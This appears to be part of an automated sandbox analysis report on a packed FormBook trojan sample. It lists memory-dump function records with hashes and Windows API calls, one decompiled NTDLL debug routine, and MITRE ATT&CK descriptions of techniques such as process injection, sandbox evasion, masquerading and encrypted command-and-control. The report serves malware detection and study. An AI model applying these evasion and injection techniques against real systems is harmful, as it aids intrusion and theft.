Instruction ID: f8df56d013eebd291b746a65d27ecfd5cf98dc06b6737f680720a8c03455b882
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: 9B0121B5D4020DBBDF10EBE4DC41FADB3B99B54308F104199EA0897240F671EB14DB91

Uniqueness

Uniqueness Score: -1.00%

Function 02CD8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CD8584

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 6c7858463be450349183cb229f79f18469020557abe99f01e19afac585384650
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: A2015FB2214108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02CD852E, Relevance: 1.5, APIs: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02CD8584

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 6192752af80ed6943e8f37135ff11c23ac0442bf9fab496d9bc96c6b95e55c38
Instruction ID: 288a75853f2213cd482ad69d619fac0cf7f734b09db27144a74149a863be62c8
Opcode Fuzzy Hash: 6192752af80ed6943e8f37135ff11c23ac0442bf9fab496d9bc96c6b95e55c38
Instruction Fuzzy Hash: 0901B2B2215149AFCB44DF98DC80DEB77BDAF8C314F15825DFA4997251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02CD7000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02CCCCC0,?,?), ref: 02CD703C

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction ID: a1b1a912ab01077203c03ad8100404eb8b62dfbae4d64a5b3db41eac8a907048
Opcode Fuzzy Hash: 473dbcfab93db6e432a80a17414ec1433c52d710a873f6e391b32a5e11b2618c
Instruction Fuzzy Hash: 2AE092333803043AE33065A9AC02FA7B39DCB81B34F54002AFB0DEB2C0D595F90146E9

Uniqueness

Uniqueness Score: -1.00%

Function 02CD85C5, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02CCCF92,02CCCF92,?,00000000,?,?), ref: 02CD8650

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c399201017d67f79e7bd3e258753d3f73ea75e9c2f89b3c52010388a969d9e8b
Instruction ID: 2ea7068d1a4c9dfe9f520801b6abcf1f64e4650264b731ef9548595162a944ef
Opcode Fuzzy Hash: c399201017d67f79e7bd3e258753d3f73ea75e9c2f89b3c52010388a969d9e8b
Instruction Fuzzy Hash: 6DE092B16452416BCB21DF158C44FD73B289F83210F048185FA485B242C430A815C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 02CD861C, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02CCCF92,02CCCF92,?,00000000,?,?), ref: 02CD8650

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 7e2a435b7d0d65e5e71ccb4e4a6c98b3de9d1ec049006f848a61d2e41d617f8c
Instruction ID: 57067cb029ba9ddeedf2ed4d742217a138b0bbab66db13910f93edf7b2f422df
Opcode Fuzzy Hash: 7e2a435b7d0d65e5e71ccb4e4a6c98b3de9d1ec049006f848a61d2e41d617f8c
Instruction Fuzzy Hash: 98E01AB16002186BDB10DF84CC84EEB37A9AF89650F118555FA09AB241CA34E9118BF1

Uniqueness

Uniqueness Score: -1.00%

Function 02CD8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02CCCF92,02CCCF92,?,00000000,?,?), ref: 02CD8650

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 26ba9d49d6a090a6ce64ebe4036c74d513a066369005ee865fa94cdf9d59ba62
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 42E01AB12002086BDB10DF49CC84EE737ADAF88650F018154BA0857241C930F8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02CD8480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02CD3506,?,02CD3C7F,02CD3C7F,?,02CD3506,?,?,?,?,?,00000000,00000000,?), ref: 02CD84AD

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 3b6f14ed543d943c4e714eebe45238094741b7c044530e21571b339c901d3a5d
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 4AE012B1200208ABDB14EF99CC40EA777ADAF88650F118558BA085B281CA30F9118AF0

Uniqueness

Uniqueness Score: -1.00%

Function 02CCD3F7, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02CC7C63,?), ref: 02CCD42B

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: e132cc5c67d8f3e06054d9207e43b9f2c31c91a04b01ce519a46e664084f44e8
Instruction ID: 4310a2bb6dabc50b031083aab8b5989831bf82c9efe218d5d99cddedad163f97
Opcode Fuzzy Hash: e132cc5c67d8f3e06054d9207e43b9f2c31c91a04b01ce519a46e664084f44e8
Instruction Fuzzy Hash: 6EE072E2AA82802AE711FB70DC03F133B105F02200F0A09E8ED8AAB0C3DA44D0048225

Uniqueness

Uniqueness Score: -1.00%

Function 02CCD400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02CC7C63,?), ref: 02CCD42B

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 0cdeac2303e69d6d9b84f2828562d3786b1935c6a194b131b16306971f1d01e4
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: B6D0A7757903043BE610FBA49C03F2732CD9B44B04F494074FA49D73C3DA60F5004565

Uniqueness

Uniqueness Score: -1.00%

Function 02CC72E3, Relevance: 1.5, APIs: 1, Instructions: 14threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02CC72DB

Memory Dump Source

Source File: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 72f7ce76a225be9e7fe222d8e15dd08ea745f397f5f2f9abea3d6d482fad5af6
Instruction ID: 7492c785a4e2dfc0bb4d87746af980d396fc95e7526d92f8d3e173d8cd604b5b
Opcode Fuzzy Hash: 72f7ce76a225be9e7fe222d8e15dd08ea745f397f5f2f9abea3d6d482fad5af6
Instruction Fuzzy Hash: 95C08C26B2528C80C222257978105F8F728C789C32A200AEBD9A4415421952022D9A80

Uniqueness

Uniqueness Score: -1.00%

Function 045B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045B9694

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 669a077ea404a5cc62ba2e4d12ec5b630d7875795d1be5b7b8ee8486d0e72e9c
Instruction ID: c223a602d24a54ffa3bc84c67c4bab80d3b6e3873575d636cede2336060da920
Opcode Fuzzy Hash: 669a077ea404a5cc62ba2e4d12ec5b630d7875795d1be5b7b8ee8486d0e72e9c
Instruction Fuzzy Hash: E5B092B29424C5CAFB11EBA05A08B6B7A50BBD0745F26C066E2424681A4778E095F6F6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0460FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0460FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E045BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04605720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04605720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0460fdda
0x0460fde2
0x0460fde5
0x0460fdec
0x0460fdfa
0x0460fdff
0x0460fe0a
0x0460fe0f
0x0460fe17
0x0460fe1e
0x0460fe19
0x0460fe19
0x0460fe19
0x0460fe20
0x0460fe21
0x0460fe22
0x0460fe25
0x0460fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0460FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0460FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0460FE01

Memory Dump Source

Source File: 00000011.00000002.901047812.0000000004550000.00000040.00000001.sdmp, Offset: 04550000, based on PE: true

Associated: 00000011.00000002.901201929.000000000466B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 228c1f6c84291129605cbde09808ae3ddbd68abdf9c94290dafcc4798ebb2164
Instruction ID: 509f9258ec2813d9f5331c1b1c303777cd70a20c148df4b84d78332f6d47aa85
Opcode Fuzzy Hash: 228c1f6c84291129605cbde09808ae3ddbd68abdf9c94290dafcc4798ebb2164
Instruction Fuzzy Hash: AFF0F632200201BFE6291A45DC06F23BB5AEB44730F144318F628561E1EAA2FC20EAF8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.Packed2.43183.29557.7257

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph